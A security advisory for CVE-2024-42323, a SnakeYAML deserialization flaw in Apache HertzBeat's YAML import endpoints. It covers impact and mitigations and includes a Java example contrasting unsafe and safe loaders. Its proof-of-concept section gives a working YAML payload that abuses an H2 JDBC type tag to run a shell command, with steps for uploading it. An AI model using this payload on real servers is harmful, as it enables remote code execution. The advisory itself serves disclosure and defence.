HertzBeat SnakeYaml Deserialization – CVE-2024-42323

Vulnerable Version

Versions before 1.6.0.

Fixed Version

Fixed in version 1.6.0.

Base Score

8.8 High

CVE-2024-42323 Vendor Description:

Apache HertzBeat is an open-source, real-time monitoring and alerting system designed to track the health and performance of various IT assets, including servers, websites, APIs, databases, and network devices. It supports agentless monitoring, allowing easy integration with different environments using built-in protocols like HTTP, TCP, ICMP, SNMP, and JDBC. HertzBeat features a modern, web-based dashboard for visualization, supports custom metrics, and provides flexible alert rules and notification methods. With its modular architecture and RESTful APIs, it’s especially suited for dynamic cloud-native and containerized infrastructures, making it a powerful alternative to traditional monitoring solutions.

Vulnerability Description:

YAML Deserialization:

  • In the vulnerable versions of HertzBeat, the SnakeYAML library is used to parse YAML files. YAML is often used for configuration because of its human-readable format. However, a YAML document can carry type tags that instruct SnakeYAML to instantiate Java objects, so deserializing such structures is dangerous when the input is not properly restricted.

Exploiting the Vulnerability:

  • The vulnerability arises because the API endpoints /api/monitors/import and /api/alert/defines/import allow users to import new monitor types and alert definitions by submitting YAML data.
  • These API endpoints don’t properly validate or sanitize the YAML content being imported. As a result, attackers can craft specially designed YAML files that contain malicious data.

Untrusted Data:

  • When the YAML content is parsed by SnakeYAML, it can trigger the deserialization of untrusted data, such as arbitrary Java objects, depending on what is defined in the YAML content. This is typically exploited through type tags that name Java classes already present on the application's classpath.
  • If the crafted YAML is accepted and parsed, it can lead to the execution of arbitrary Java code on the target system, resulting in Remote Code Execution (RCE).

Authentication Requirement:

  • This vulnerability is only exploitable by authenticated users, which means an attacker must have valid credentials to access the API and upload the malicious YAML file. However, once authenticated, an attacker can exploit the vulnerability and execute code remotely on the HertzBeat server.

Impact:

  • The impact of this vulnerability is high because it allows authenticated attackers to remotely execute code on the server, potentially leading to full control over the affected system.
  • This could be used to gain unauthorized access to sensitive data, modify configurations, or further compromise the underlying infrastructure.

Mitigations:

  • The vulnerability was addressed in Apache HertzBeat version 1.6.0 by updating the SnakeYAML library to a more secure version, reducing the chance of deserialization issues.
  • Organizations using versions prior to 1.6.0 should immediately upgrade to the most recent version to mitigate the vulnerability.
  • Furthermore, security best practices such as input validation, least privilege access, and stringent API authorization can help limit the risk of exploitation.
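As an added defensive example (not code from HertzBeat or from this advisory), the Java below places the SnakeYAML loading pattern that makes the import endpoints exploitable next to a loader restricted to standard YAML types, which rejects a tagged document before any class is resolved. The class name, method names and both sample documents are constructed for illustration; it assumes SnakeYAML 1.33 or later (2.x included) on the classpath.

```java
import java.util.List;
import java.util.Map;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class MonitorImportLoader {

    // Constructed sample: the shape a legitimate monitor-definition import has
    // (plain scalars, sequences and maps, no type tags).
    static final String BENIGN_IMPORT =
        "- app: website\n" +
        "  name: intranet-portal\n" +
        "  host: 10.0.0.5\n" +
        "  intervals: 60\n";

    // Constructed sample carrying the same kind of '!!' global type tag as the
    // advisory's payload; the JDBC URL is a placeholder, only the tag matters.
    static final String TAGGED_IMPORT =
        "!!org.h2.jdbc.JdbcConnection [\"jdbc:h2:mem:placeholder\", [], \"a\", \"b\", false]\n";

    // Vulnerable pattern (SnakeYAML 1.x): the default constructor resolves any
    // '!!' global tag to a Java class and instantiates it during parsing.
    static Object loadUnsafe(String document) {
        return new Yaml().load(document);
    }

    // Hardened pattern: SafeConstructor only builds standard YAML types (maps,
    // lists, strings, numbers, booleans, null) and throws a YAMLException for
    // every global tag, so no application class is ever looked up.
    static Object loadSafe(String document) {
        Yaml loader = new Yaml(new SafeConstructor(new LoaderOptions()));
        return loader.load(document);
    }

    // Server-side gate for an import endpoint: accept only documents that the
    // safe loader parses into a list of maps; reject everything else.
    static boolean isAcceptedImport(String document) {
        try {
            Object parsed = loadSafe(document);
            if (!(parsed instanceof List)) return false;
            for (Object item : (List<?>) parsed) {
                if (!(item instanceof Map)) return false;
            }
            return true;
        } catch (YAMLException e) {
            return false;   // tagged or malformed document: refuse the import
        }
    }

    public static void main(String[] args) {
        System.out.println("benign accepted: " + isAcceptedImport(BENIGN_IMPORT)); // true
        System.out.println("tagged accepted: " + isAcceptedImport(TAGGED_IMPORT)); // false
    }
}
```

Logging the rejected document's tag (available from the exception message) gives a cheap detection signal for import attempts that carry global type tags.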

POC

First, create a malicious YAML file whose name ends with .yaml:

!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]

Then, log into the HertzBeat dashboard, go to any monitor page, and find the import button. The interface lets users import monitor configurations from YAML files; submit the malicious YAML file there:


When the malicious YAML file is loaded via the web interface, HertzBeat attempts to deserialize its contents, resulting in remote code execution:


References:

https://nvd.nist.gov/vuln/detail/cve-2024-42323

https://github.com/vulhub/vulhub/tree/master/hertzbeat/CVE-2024-42323
